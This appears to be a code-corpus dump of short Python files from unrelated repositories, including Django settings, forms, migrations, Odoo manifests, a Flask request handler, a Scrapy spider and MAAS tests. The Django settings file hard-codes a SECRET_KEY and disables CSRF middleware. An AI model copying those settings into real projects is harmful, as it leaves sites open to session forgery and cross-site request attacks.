# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# Registers the 'create' sub-command with the VoltDB CLI framework.
# NOTE(review): 'VOLT' is injected into this file's namespace by the voltcli
# runtime loader, so there is deliberately no import for it here.
@VOLT.Command(
    bundles = VOLT.ServerBundle('create',
                                needs_catalog=True,
                                supports_live=False,
                                default_host=True,
                                safemode_available=False,
                                supports_daemon=True),
    options = (
        # Hidden option to restore the hashinator in addition to the tables.
        VOLT.BooleanOption('-r', '--replica', 'replica', 'start replica cluster', default = False),
    ),
    description = 'Start a new, empty database.'
)
def create(runner):
    """Run the 'create' command: start a new, empty database (all work is in runner.go)."""
    runner.go()
|
markherringer/waywayd
|
settings.py
|
# -*- coding: utf-8 -*-
# Django settings for basic pinax project.
import os.path
import posixpath
import pinax
PINAX_ROOT = os.path.abspath(os.path.dirname(pinax.__file__))
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
# tells Pinax to use the default theme
PINAX_THEME = "default"
DEBUG = False
TEMPLATE_DEBUG = DEBUG
# tells Pinax to serve media through the staticfiles app.
SERVE_MEDIA = DEBUG
INTERNAL_IPS = [
    "127.0.0.1",
]
ADMINS = [
    # ("Your Name", "your_email@domain.com"),
]
MANAGERS = ADMINS
# Local time zone for this installation. Choices can be found here:
# http://www.postgresql.org/docs/8.1/static/datetime-keywords.html#DATETIME-TIMEZONE-SET-TABLE
# although not all variations may be possible on all operating systems.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = "US/Eastern"
# Language code for this installation. All choices can be found here:
# http://www.w3.org/TR/REC-html40/struct/dirlang.html#langcodes
# http://blogs.law.harvard.edu/tech/stories/storyReader$15
LANGUAGE_CODE = "en"
ugettext = lambda s: s
LANGUAGES = (
    ('en', u'English'),
    ('it', u'Italiano'),
)
CMS_LANGUAGES = LANGUAGES
# Make English the default language
DEFAULT_LANGUAGE = 1
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
# (a redundant duplicate USE_I18N assignment was removed from above)
USE_I18N = True
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'media')
# URL that handles the media served from MEDIA_ROOT.
# Example: "http://media.lawrence.com"
MEDIA_URL = '/site_media/media/'
# Absolute path to the directory that holds static files like app media.
# Example: "/home/media/media.lawrence.com/apps/"
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'site_media', 'static')
# URL that handles the static files like app media.
# Example: "http://media.lawrence.com"
STATIC_URL = '/site_media/static/'
# Additional directories which hold static files
STATICFILES_DIRS = (
    ('basic071', os.path.join(PROJECT_ROOT, 'media')),
    ('pinax', os.path.join(PINAX_ROOT, 'media', PINAX_THEME)),
)
ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")
# 1.2
#MEDIA_ROOT = os.path.join(PROJECT_ROOT, "site_media", "media")
#MEDIA_URL = "/site_media/media/"
OLWIDGET_MEDIA_URL = "/site_media/static/olwidget/"
#STATIC_ROOT = os.path.join(PROJECT_ROOT, "site_media", "static")
#STATIC_URL = "/site_media/static/"
#STATICFILES_DIRS = [
#    os.path.join(PROJECT_ROOT, "media"),
#    os.path.join(PINAX_ROOT, "media", PINAX_THEME),
#]
#ADMIN_MEDIA_PREFIX = posixpath.join(STATIC_URL, "admin/")
# Make this unique, and don"t share it with anybody.
SECRET_KEY = "wdsk$eseb7-11y_kb%r$j)%azk-0&l*v#q0$j0d2e%aqcna+l$"
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = [
    "django.template.loaders.filesystem.load_template_source",
    "django.template.loaders.app_directories.load_template_source",
]
MIDDLEWARE_CLASSES = [
    'django.middleware.cache.UpdateCacheMiddleware',
    "django.middleware.common.CommonMiddleware",
    "django.contrib.sessions.middleware.SessionMiddleware",
    #"django.middleware.csrf.CsrfViewMiddleware",
    "django.contrib.auth.middleware.AuthenticationMiddleware",
    "django_openid.consumer.SessionConsumer",
    #"django.contrib.messages.middleware.MessageMiddleware",
    "middleware.LocaleMiddleware",
    "django.middleware.doc.XViewMiddleware",
    "pagination.middleware.PaginationMiddleware",
    "pinax.middleware.security.HideSensistiveFieldsMiddleware",
    'middleware.MultilingualURLMiddleware',
    'middleware.DefaultLanguageMiddleware',
    #"debug_toolbar.middleware.DebugToolbarMiddleware",
    'django.middleware.cache.FetchFromCacheMiddleware',
    "flatpages.middleware.FlatpageFallbackMiddleware",
]
ROOT_URLCONF = "urls"
TEMPLATE_DIRS = [
    os.path.join(PROJECT_ROOT, "templates"),
    os.path.join(PINAX_ROOT, "templates", PINAX_THEME),
]
TEMPLATE_CONTEXT_PROCESSORS = [
    "django.core.context_processors.auth",
    "django.core.context_processors.debug",
    "django.core.context_processors.i18n",
    "django.core.context_processors.media",
    "django.core.context_processors.request",
    #"django.contrib.messages.context_processors.messages",
    "pinax.core.context_processors.pinax_settings",
    "notification.context_processors.notification",
    "announcements.context_processors.site_wide_announcements",
    "account.context_processors.openid",
    "account.context_processors.account",
    "multilingual.context_processors.multilingual",
]
INSTALLED_APPS = [
    # included
    "django.contrib.admin",
    "django.contrib.auth",
    "django.contrib.contenttypes",
    "django.contrib.sessions",
    "django.contrib.sites",
    #"django.contrib.messages",
    "django.contrib.humanize",
    "django.contrib.gis",
    "django.contrib.sitemaps",
    "flatpages",
    "pinax.templatetags",
    # external
    "notification", # must be first
    "django_openid",
    "emailconfirmation",
    "mailer",
    "announcements",
    "pagination",
    "timezones",
    "ajax_validation",
    "uni_form",
    "staticfiles",
    #"debug_toolbar",
    #added to basic_project
    "django_extensions",
    "tagging",
    # internal (for now)
    "basic_profiles",
    "account",
    "signup_codes",
    "about",
    # non-pinax
    "rosetta",
    # ours
    "olwidget",
    "attractions",
    # (duplicate "django_extensions" entry removed; it is already listed above)
    "multilingual",
]
#MESSAGE_STORAGE = "django.contrib.messages.storage.session.SessionStorage"
ABSOLUTE_URL_OVERRIDES = {
    "auth.user": lambda o: "/profiles/profile/%s/" % o.username,
}
MARKUP_FILTER_FALLBACK = "none"
MARKUP_CHOICES = [
    ("restructuredtext", u"reStructuredText"),
    ("textile", u"Textile"),
    ("markdown", u"Markdown"),
    ("creole", u"Creole"),
]
WIKI_MARKUP_CHOICES = MARKUP_CHOICES
AUTH_PROFILE_MODULE = "basic_profiles.Profile"
NOTIFICATION_LANGUAGE_MODULE = "account.Account"
ACCOUNT_OPEN_SIGNUP = True
ACCOUNT_REQUIRED_EMAIL = False
ACCOUNT_EMAIL_VERIFICATION = False
ACCOUNT_EMAIL_AUTHENTICATION = False
ACCOUNT_UNIQUE_EMAIL = EMAIL_CONFIRMATION_UNIQUE_EMAIL = False
if ACCOUNT_EMAIL_AUTHENTICATION:
    AUTHENTICATION_BACKENDS = [
        "account.auth_backends.EmailModelBackend",
    ]
else:
    AUTHENTICATION_BACKENDS = [
        "django.contrib.auth.backends.ModelBackend",
    ]
EMAIL_CONFIRMATION_DAYS = 2
EMAIL_DEBUG = DEBUG
CONTACT_EMAIL = ""
SITE_NAME = ""
LOGIN_URL = "/account/login/"
LOGIN_REDIRECT_URLNAME = "what_next"
DEBUG_TOOLBAR_CONFIG = {
    "INTERCEPT_REDIRECTS": False,
}
LANGUAGE_HREF_IGNORES = ['sitemap']
# local_settings.py can be used to override environment-specific settings
# like database and email that differ between development and production.
try:
    from local_settings import *
except ImportError:
    pass
FORCE_LOWERCASE_TAGS = True
#CACHE_BACKEND = "memcached://127.0.0.1:11211/"
#CACHE_MIDDLEWARE_SECONDS = 10000
#CACHE_MIDDLEWARE_KEY_PREFIX = 'cittadelcapo'
#CACHE_MIDDLEWARE_ANONYMOUS_ONLY = True
|
UWCS/uwcs-website
|
uwcs_website/rest.py
|
from django_restapi.model_resource import Collection
from django_restapi.responder import XMLResponder
from django_restapi.resource import Resource
from django_restapi.authentication import *
from django.contrib.auth.models import User
from django.shortcuts import render_to_response,get_object_or_404
from uwcs_website.games.models import Game
#class UserEntry(Resource):
# def read(self, request, user_id):
# context = {'friendship':get_object_or_404(}
# return render_to_response('xml/user.xml', context)
# Read-only XML collection exposing selected User fields; requires
# HTTP Basic authentication.
xml_user = Collection(
    queryset = User.objects.all(),
    permitted_methods = ('GET',),
    expose_fields = ('first_name','last_name','is_staff'),
    responder = XMLResponder(),
    authentication = HttpBasicAuthentication()
)
# Read-only XML collection of all Game objects; no authentication required.
xml_games = Collection(
    queryset = Game.objects.all(),
    permitted_methods = ('GET',),
    responder = XMLResponder(),
)
|
OpenPymeMx/account-financial-tools
|
account_tax_analysis/__openerp__.py
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author Vincent Renaville. Copyright 2013 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# Odoo/OpenERP addon manifest: pure data describing the "Tax analysis" module.
{"name": "Tax analysis",
 "version": "8.0.1.0.0",
 "depends": ["base", "account"],
 "author": "Camptocamp SA,Odoo Community Association (OCA)",
 "category": 'Accounting & Finance',
 "website": "http://www.camptocamp.com",
 "license": "AGPL-3",
 # XML data files loaded on module install/update
 "data": ["account_tax_analysis_view.xml"],
 # not installable in this state (kept for history / migration)
 'installable': False,
 "active": False,
 }
|
BirkbeckCTP/janeway
|
src/core/homepage_elements/about/forms.py
|
from django import forms
from utils import setting_handler
from core.homepage_elements.about import plugin_settings
class AboutForm(forms.Form):
    """Configuration form for the 'about' homepage element."""

    title = forms.CharField(
        help_text='The title of the about block eg. "About this Journal"',
    )
    description = forms.CharField(
        widget=forms.Textarea,
        help_text='A general description of the journal.',
    )

    def save(self, journal, commit=True):
        """Persist the block title (plugin setting) and the journal description.

        With ``commit=False`` nothing is written, mirroring Django's
        ``ModelForm.save`` convention.
        """
        block_title = self.cleaned_data.get('title')
        journal_description = self.cleaned_data.get('description')
        if not commit:
            return
        setting_handler.save_plugin_setting(
            plugin_settings.get_self(),
            'about_title',
            block_title,
            journal,
        )
        setting_handler.save_setting(
            'general',
            'journal_description',
            journal,
            journal_description,
        )
|
edx/edx-enterprise
|
integrated_channels/cornerstone/migrations/0007_auto_20210708_1446.py
|
# Generated by Django 2.2.20 on 2021-07-08 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: only updates the help_text on the
    # catalogs_to_transmit fields (no database schema change for TextField).

    dependencies = [
        ('cornerstone', '0006_auto_20191001_0742'),
    ]
    operations = [
        migrations.AlterField(
            model_name='cornerstoneenterprisecustomerconfiguration',
            name='catalogs_to_transmit',
            field=models.TextField(blank=True, help_text='A comma-separated list of catalog UUIDs to transmit. If blank, all customer catalogs will be transmitted. If there are overlapping courses in the customer catalogs, the overlapping course metadata will be selected from the newest catalog.', null=True),
        ),
        migrations.AlterField(
            model_name='historicalcornerstoneenterprisecustomerconfiguration',
            name='catalogs_to_transmit',
            field=models.TextField(blank=True, help_text='A comma-separated list of catalog UUIDs to transmit. If blank, all customer catalogs will be transmitted. If there are overlapping courses in the customer catalogs, the overlapping course metadata will be selected from the newest catalog.', null=True),
        ),
    ]
|
RosesTheN00b/BudgetButlerWeb
|
butler_offline/viewcore/request_handler.py
|
'''
Created on 04.12.2017
@author: sebastian
'''
from flask import render_template
from flask import redirect
from requests.exceptions import ConnectionError
from butler_offline.viewcore.state import persisted_state
from butler_offline.viewcore import request_handler
from butler_offline.viewcore import viewcore
from butler_offline.viewcore.base_html import set_error_message
import random
# Monotonically increasing version, bumped on each accepted transactional POST.
DATABASE_VERSION = 0
# Random token identifying this server session; part of the transaction key.
SESSION_RANDOM = str(random.random())
# Indirections so tests can stub redirecting/rendering (see stub_me / stub_me_theme).
REDIRECTOR = lambda x: redirect(x, code=301)
RENDER_FULL_FUNC = render_template
BASE_THEME_PATH = 'theme/'
# Context key that signals handle_request to issue a redirect instead of rendering.
REDIRECT_KEY = 'redirect_to'
def handle_request(request, request_action, html_base_page):
    """Execute *request_action* for *request* and render the result into the theme.

    POST requests carrying an 'ID' value are treated as transactional: the ID
    must equal the current transaction key, otherwise a race-condition error
    page is rendered (protects against double-submit of stale forms).
    """
    if request.method == 'POST' and 'ID' in request.values:
        print('transactional request found')
        if request.values['ID'] != current_key():
            # Stale or replayed token: render the race error page instead.
            print('transaction rejected (requested:' + current_key() + ", got:" + request.values['ID'] + ')')
            context = viewcore.generate_base_context('Fehler')
            rendered_content = request_handler.RENDER_FULL_FUNC(theme('core/error_race.html'), **{})
            context['content'] = rendered_content
            return request_handler.RENDER_FULL_FUNC(theme('index.html'), **context)
        print('transaction allowed')
        # Accepted: bump the version so the same token cannot be replayed.
        request_handler.DATABASE_VERSION = request_handler.DATABASE_VERSION + 1
        print('new db version: ' + str(request_handler.DATABASE_VERSION))
    # Fallback context in case request_action raises before producing one.
    context = viewcore.generate_base_context('Fehler')
    try:
        context = request_action(request)
        persisted_state.save_tainted()
    except ConnectionError as err:
        # requests.ConnectionError: server unreachable (message is German, user-facing)
        set_error_message(context, 'Verbindung zum Server konnte nicht aufgebaut werden.')
        context['%Errortext'] = ''
    except Exception as e:
        # Broad catch-all boundary: any action failure becomes an error page.
        set_error_message(context, 'Ein Fehler ist aufgetreten: \n ' + str(e))
        print(e)
        context['%Errortext'] = ''
    if request.method == 'POST' and 'redirect' in request.values:
        return request_handler.REDIRECTOR('/' + str(request.values['redirect']) + '/')
    if '%Errortext' in context:
        rendered_content = context['%Errortext']
    elif REDIRECT_KEY in context:
        return REDIRECTOR(context[REDIRECT_KEY])
    else:
        # The action may request an alternative template via 'special_page'.
        if 'special_page' in context:
            html_base_page = context['special_page']
        rendered_content = request_handler.RENDER_FULL_FUNC(theme(html_base_page), **context)
    context['content'] = rendered_content
    response = request_handler.RENDER_FULL_FUNC(theme('index.html'), **context)
    return response
def create_redirect_context(url):
    """Build a context instructing handle_request to redirect to *url*."""
    context = {}
    context[REDIRECT_KEY] = url
    return context
def theme(page):
    """Prefix *page* with the configured theme base path."""
    base_path = request_handler.BASE_THEME_PATH
    return base_path + page
def current_key():
    """Return the transaction token for the current session and database version."""
    db_name = persisted_state.database_instance().name
    version = str(request_handler.DATABASE_VERSION)
    return request_handler.SESSION_RANDOM + ' ' + db_name + '_VERSION_' + version
def stub_me():
    """Replace render/redirect indirections with plain test stubs."""
    request_handler.REDIRECTOR = lambda x: x
    request_handler.RENDER_FULL_FUNC = full_render_stub
def stub_me_theme():
    """Replace render/redirect indirections with theme-aware test stubs."""
    request_handler.REDIRECTOR = lambda x: x
    request_handler.RENDER_FULL_FUNC = full_render_stub_theme
def full_render_stub(theme, **context):
    """Render stub for tests: ignore the template name and echo the context."""
    return context
def full_render_stub_theme(theme, **context):
    """Render stub: return the context once content was rendered, else the template name."""
    if 'content' in context:
        return context
    return theme
|
datagutten/comics
|
comics/accounts/forms.py
|
# Based on https://bitbucket.org/jokull/django-email-login/
from django.contrib.auth import authenticate
from django.contrib.auth import forms as auth_forms
from django.contrib.auth.models import User
from django import forms
from django.utils.translation import ugettext_lazy as _
attrs_dict = {'class': 'required'}
class RegistrationForm(forms.Form):
    """Signup form: an email address plus a password typed twice."""
    email = forms.EmailField(
        widget=forms.TextInput(attrs=dict(attrs_dict, maxlength=75)),
        label=_("Email"))
    password1 = forms.CharField(
        widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
        label=_("Password"))
    password2 = forms.CharField(
        widget=forms.PasswordInput(attrs=attrs_dict, render_value=False),
        label=_("Password (again)"))
    def clean(self):
        """
        Verify that the two password fields match. The error is raised from
        clean() (not a field clean), so it lands in non_field_errors().
        """
        data = self.cleaned_data
        both_present = 'password1' in data and 'password2' in data
        if both_present and data['password1'] != data['password2']:
            raise forms.ValidationError(_(
                "The two password fields didn't match."))
        return data
    def clean_email(self):
        """
        Reject an email address that is already registered on the site
        (case-insensitive match).
        """
        email = self.cleaned_data['email']
        if User.objects.filter(email__iexact=email):
            raise forms.ValidationError(_(
                "This email address is already in use. "
                "Please supply a different email address."))
        return email
class AuthenticationForm(forms.Form):
    """
    Base class for authenticating users. Extend this to get a form that accepts
    username/password logins.
    """
    email = forms.EmailField(label=_("Email"), max_length=75)
    password = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    def __init__(self, request=None, *args, **kwargs):
        """
        If request is passed in, the form will validate that cookies are
        enabled. Note that the request (a HttpRequest object) must have set a
        cookie with the key TEST_COOKIE_NAME and value TEST_COOKIE_VALUE before
        running this validation.
        """
        self.request = request
        # Filled in by clean() once authentication succeeds.
        self.user_cache = None
        super(AuthenticationForm, self).__init__(*args, **kwargs)
    def clean(self):
        """Authenticate with email+password; raise on failure or inactive account."""
        email = self.cleaned_data.get('email')
        password = self.cleaned_data.get('password')
        if email and password:
            # NOTE(review): passes `email=` to authenticate(); presumably an
            # email-based auth backend is configured — confirm in settings.
            self.user_cache = authenticate(email=email, password=password)
            if self.user_cache is None:
                raise forms.ValidationError(_(
                    "Please enter a correct username and password. "
                    "Note that both fields are case-sensitive."))
            elif not self.user_cache.is_active:
                raise forms.ValidationError(_("This account is inactive."))
        return self.cleaned_data
    def get_user_id(self):
        """Return the authenticated user's id, or None if not authenticated."""
        if self.user_cache:
            return self.user_cache.id
        return None
    def get_user(self):
        """Return the authenticated user object (None before/after failed clean)."""
        return self.user_cache
class PasswordResetForm(auth_forms.PasswordResetForm):
    """Stock password-reset form with the email field label forced to 'Email'."""
    def __init__(self, *args, **kwargs):
        super(PasswordResetForm, self).__init__(*args, **kwargs)
        self.fields['email'].label = 'Email'
|
acsone/server-tools
|
auth_totp/__openerp__.py
|
# -*- coding: utf-8 -*-
# Copyright 2016-2017 LasLabs Inc.
# License LGPL-3.0 or later (http://www.gnu.org/licenses/lgpl.html).
# Odoo/OpenERP module manifest for the MFA (multi-factor auth) addon.
{
    'name': 'MFA Support',
    'summary': 'Allows users to enable MFA and add optional trusted devices',
    'version': '8.0.1.0.0',
    'category': 'Extra Tools',
    'website': 'https://laslabs.com/',
    'author': 'LasLabs, Odoo Community Association (OCA)',
    'license': 'LGPL-3',
    'application': False,
    'installable': True,
    # pyotp provides the TOTP code generation/verification.
    'external_dependencies': {
        'python': ['pyotp'],
    },
    'depends': [
        'report',
        'web',
    ],
    # Data files are loaded in order: parameters, ACLs, record rules, views.
    'data': [
        'data/ir_config_parameter.xml',
        'security/ir.model.access.csv',
        'security/res_users_authenticator_security.xml',
        'wizards/res_users_authenticator_create.xml',
        'views/auth_totp.xml',
        'views/res_users.xml',
    ],
}
|
agarsev/grafeno
|
grafeno/transformers/extend.py
|
from collections import deque
from nltk.corpus import wordnet as wn
from grafeno.transformers.wordnet import Transformer as WNGet
from grafeno.transformers.__utils import Transformer as Utils
class Transformer (WNGet, Utils):
    '''Adds to the graph all WordNet hypernyms of every possible concept node.
    The hypernyms are added as nodes with grammateme ``hyper = True'', and
    related by edges with functor ``HYP''.
    Parameters
    ----------
    extend_min_depth : int
        Minimum depth of hypernyms to add. This depth is defined as the shortest
        path from the synset to the root of the WordNet hypernym hierarchy.
    '''
    def __init__ (self, extend_min_depth = 4, **kwds):
        super().__init__(**kwds)
        # Hypernyms shallower than this are considered too generic to add.
        self.__min_depth = extend_min_depth
    def post_process (self):
        """Breadth-first sprout hypernym nodes from every synset-bearing node."""
        super().post_process()
        g = self.graph
        mind = self.__min_depth
        # Extend with hypernyms
        # Queue seeded with all current nodes; newly sprouted hypernym nodes
        # are appended so their own hypernyms get processed too.
        to_extend = deque(list(self.nodes))
        while len(to_extend)>0:
            n = to_extend.popleft()
            node = self.nodes[n]
            ss = node.get('synset')
            if not ss:
                # Node has no WordNet synset attached; nothing to extend.
                continue
            for cc in ss.hypernyms() + ss.instance_hypernyms():
                # NOTE(review): depth is taken from the child synset `ss`, not
                # the hypernym `cc` being added — confirm this is intended.
                depth = ss.min_depth()
                if depth < mind:
                    continue
                concept = cc.lemmas()[0].name()
                # Weight grows toward 1 with depth: deeper (more specific)
                # hypernyms get heavier HYP edges.
                nid = self.sprout(n,
                        {'functor':'HYP','weight':depth/(depth+1)},
                        {'concept':concept,'synset':cc,'hyper':True})
                to_extend.append(nid)
|
teltek/edx-platform
|
lms/djangoapps/grades/api/urls.py
|
"""
Grades API URLs.
"""
from django.conf import settings
from django.conf.urls import include, url
from lms.djangoapps.grades.api import views
# Namespace used for reversing these URLs.
app_name = 'lms.djangoapps.grades'
urlpatterns = [
    # v0: per-user course grade detail.
    url(
        r'^v0/course_grade/{course_id}/users/$'.format(
            course_id=settings.COURSE_ID_PATTERN,
        ),
        views.UserGradeView.as_view(), name='user_grade_detail'
    ),
    # v0: course grading policy (assignment types, weights).
    url(
        r'^v0/courses/{course_id}/policy/$'.format(
            course_id=settings.COURSE_ID_PATTERN,
        ),
        views.CourseGradingPolicy.as_view(), name='course_grading_policy'
    ),
    # v1 endpoints live in their own urlconf.
    url(r'^v1/', include('grades.api.v1.urls', namespace='v1'))
]
|
cloudbase/maas
|
src/maasserver/tests/test_sequence.py
|
# Copyright 2012, 2013 Canonical Ltd. This software is licensed under the
# GNU Affero General Public License version 3 (see the file LICENSE).
"""Test :class:`Sequence`."""
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
str = None
__metaclass__ = type
__all__ = []
import random
from django.db import connection
from django.db.utils import DatabaseError
from maasserver.sequence import Sequence
from maasserver.testing.factory import factory
from maasserver.testing.testcase import MAASServerTestCase
class TestSequence(MAASServerTestCase):
    """Exercise Sequence against a real PostgreSQL sequence."""
    def query_seq(self, name):
        """Return nextval() of the named database sequence."""
        cursor = connection.cursor()
        cursor.execute(
            "SELECT nextval(%s)", [name])
        return cursor.fetchone()[0]
    def test_create_sequence(self):
        # A freshly created sequence starts at 1.
        name = factory.make_name('seq', sep='')
        seq = Sequence(name)
        seq.create()
        val = self.query_seq(seq.name)
        self.assertEqual(1, val)
    def test_sequence_respects_minvalue(self):
        # First value equals the configured minvalue.
        name = factory.make_name('seq', sep='')
        minvalue = random.randint(1, 50)
        seq = Sequence(name, minvalue=minvalue)
        seq.create()
        val = self.query_seq(seq.name)
        self.assertEqual(minvalue, val)
    def test_sequence_respects_incr(self):
        # Two nextval() calls advance by the configured increment.
        name = factory.make_name('seq', sep='')
        incr = random.randint(1, 50)
        seq = Sequence(name, incr=incr)
        seq.create()
        val = self.query_seq(seq.name)
        val = self.query_seq(seq.name)
        self.assertEqual(1 + incr, val)
    def test_sequence_respects_maxvalue_and_cycles(self):
        # Restart at maxvalue; the next call must wrap back to 1.
        name = factory.make_name('seq', sep='')
        maxvalue = random.randint(10, 50)
        seq = Sequence(name, maxvalue=maxvalue)
        seq.create()
        cursor = connection.cursor()
        query = "ALTER SEQUENCE %s" % seq.name
        cursor.execute(query + " RESTART WITH %s", [maxvalue])
        val = self.query_seq(seq.name)
        val = self.query_seq(seq.name)
        self.assertEqual(1, val)
    def test_drop_sequence(self):
        # After drop(), querying the sequence raises a DatabaseError.
        name = factory.make_name('seq', sep='')
        seq = Sequence(name)
        seq.create()
        seq.drop()
        self.assertRaisesRegexp(
            DatabaseError, "does not exist", self.query_seq,
            seq.name)
    def test_nextval_returns_sequential_values(self):
        # nextval() yields 1..10 for default settings.
        name = factory.make_name('seq', sep='')
        seq = Sequence(name)
        seq.create()
        self.assertSequenceEqual(
            range(1, 11), [seq.nextval() for i in range(10)])
|
HelloLily/hellolily
|
lily/messaging/email/migrations/0044_auto_20181106_1003.py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-11-06 10:03
from __future__ import unicode_literals
import django.contrib.postgres.fields
import django.contrib.postgres.fields.jsonb
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import lily.messaging.email.models.models
import re
class Migration(migrations.Migration):
    """Add EmailDraft/EmailDraftAttachment models and a bcc M2M on EmailMessage."""
    dependencies = [
        ('tenant', '0008_auto_20180822_1308'),
        ('email', '0043_auto_20180906_1300'),
    ]
    operations = [
        # Draft message: recipients as Postgres arrays, headers as JSONB.
        migrations.CreateModel(
            name='EmailDraft',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('to', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='to')),
                ('cc', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='cc')),
                ('bcc', django.contrib.postgres.fields.ArrayField(base_field=models.EmailField(max_length=254), size=None, verbose_name='bcc')),
                ('headers', django.contrib.postgres.fields.jsonb.JSONField(default=dict, verbose_name='email headers')),
                ('subject', models.CharField(blank=True, max_length=255, verbose_name='subject')),
                ('body', models.TextField(blank=True, verbose_name='html body')),
                ('mapped_attachments', models.IntegerField(verbose_name='number of mapped attachments')),
                ('original_attachment_ids', models.TextField(default=b'', validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
                ('template_attachment_ids', models.CharField(default=b'', max_length=255, validators=[django.core.validators.RegexValidator(re.compile('^\\d+(?:\\,\\d+)*\\Z'), code='invalid', message='Enter only digits separated by commas.')])),
                ('original_message_id', models.CharField(blank=True, db_index=True, default=b'', max_length=50)),
                ('send_from', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='draft_messages', to='email.EmailAccount', verbose_name='from')),
                ('tenant', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='tenant.Tenant')),
            ],
            options={
                'verbose_name': 'email draft message',
                'verbose_name_plural': 'email draft messages',
            },
        ),
        # File attachments linked to a draft.
        migrations.CreateModel(
            name='EmailDraftAttachment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('inline', models.BooleanField(default=False)),
                ('attachment', models.FileField(max_length=255, upload_to=lily.messaging.email.models.models.get_outbox_attachment_upload_path)),
                ('size', models.PositiveIntegerField(default=0)),
                ('content_type', models.CharField(max_length=255, verbose_name='content type')),
                ('email_draft', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='attachments', to='email.EmailDraft')),
                ('tenant', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, to='tenant.Tenant')),
            ],
            options={
                'verbose_name': 'email draft attachment',
                'verbose_name_plural': 'email draft attachments',
            },
        ),
        # Track bcc recipients on existing messages.
        migrations.AddField(
            model_name='emailmessage',
            name='received_by_bcc',
            field=models.ManyToManyField(related_name='received_messages_as_bcc', to='email.Recipient'),
        ),
    ]
|
snoack/cocktail-search
|
crawler/cocktails/spiders/drinksmixer.py
|
import re
from scrapy.spiders import CrawlSpider, Rule
from scrapy.linkextractors import LinkExtractor
from scrapy.selector import HtmlXPathSelector
from lxml.cssselect import CSSSelector
from cocktails.items import CocktailItem
from cocktails.utils import html_to_text
# CSS selectors compiled to XPath once at import time.
xp_title = CSSSelector('.recipe_title').path
xp_ingredients = CSSSelector('.ingredient').path
class DrinksMixerSpider(CrawlSpider):
    """Crawl www.drinksmixer.com and scrape cocktail recipes."""
    name = 'drinksmixer'
    allowed_domains = ['www.drinksmixer.com']
    start_urls = ['http://www.drinksmixer.com/']
    rules = (
        # Recipe pages are parsed; category pages are only followed.
        Rule(LinkExtractor(allow=r'/drink[^/]+.html$'), callback='parse_recipe'),
        Rule(LinkExtractor(allow=r'/cat/')),
    )
    def parse_recipe(self, response):
        """Extract a single CocktailItem from a recipe page; [] when no title found."""
        hxs = HtmlXPathSelector(response)
        # for/else idiom: bind the first extracted title, or bail out if none.
        for title in hxs.select(xp_title).extract():
            break
        else:
            return []
        ingredients = hxs.select(xp_ingredients).extract()
        return [CocktailItem(
            # Page titles end with the word " recipe"; strip it off.
            title=re.sub(r'\s+recipe$', '', html_to_text(title)),
            picture=None,
            url=response.url,
            source='Drinks Mixer',
            ingredients=[html_to_text(x) for x in ingredients],
        )]
|
pelikanchik/edx-platform
|
docs/en_us/data/source/conf.py
|
# -*- coding: utf-8 -*-
#
import sys, os
# Detect a ReadTheDocs build via the env var it sets.
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
sys.path.append(os.path.abspath('../../../../'))
sys.path.append(os.path.abspath('../../../'))
# Pull in the shared Sphinx configuration, then local overrides below.
from docs.shared.conf import *
sys.path.insert(0, os.path.abspath('.'))
master_doc = 'index'
# Add any paths that contain templates here, relative to this directory.
templates_path.append('source/_templates')
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path.append('source/_static')
project = u'edX Data Documentation'
copyright = u'2013, edX Documentation Team'
# The short X.Y version.
version = ''
# The full version, including alpha/beta/rc tags.
release = ''
#Added to turn off smart quotes so users can copy JSON values without problems.
html_use_smartypants = False
|
CompassionCH/l10n-switzerland
|
l10n_ch_pain_credit_transfer/tests/test_ch_sct.py
|
# -*- coding: utf-8 -*-
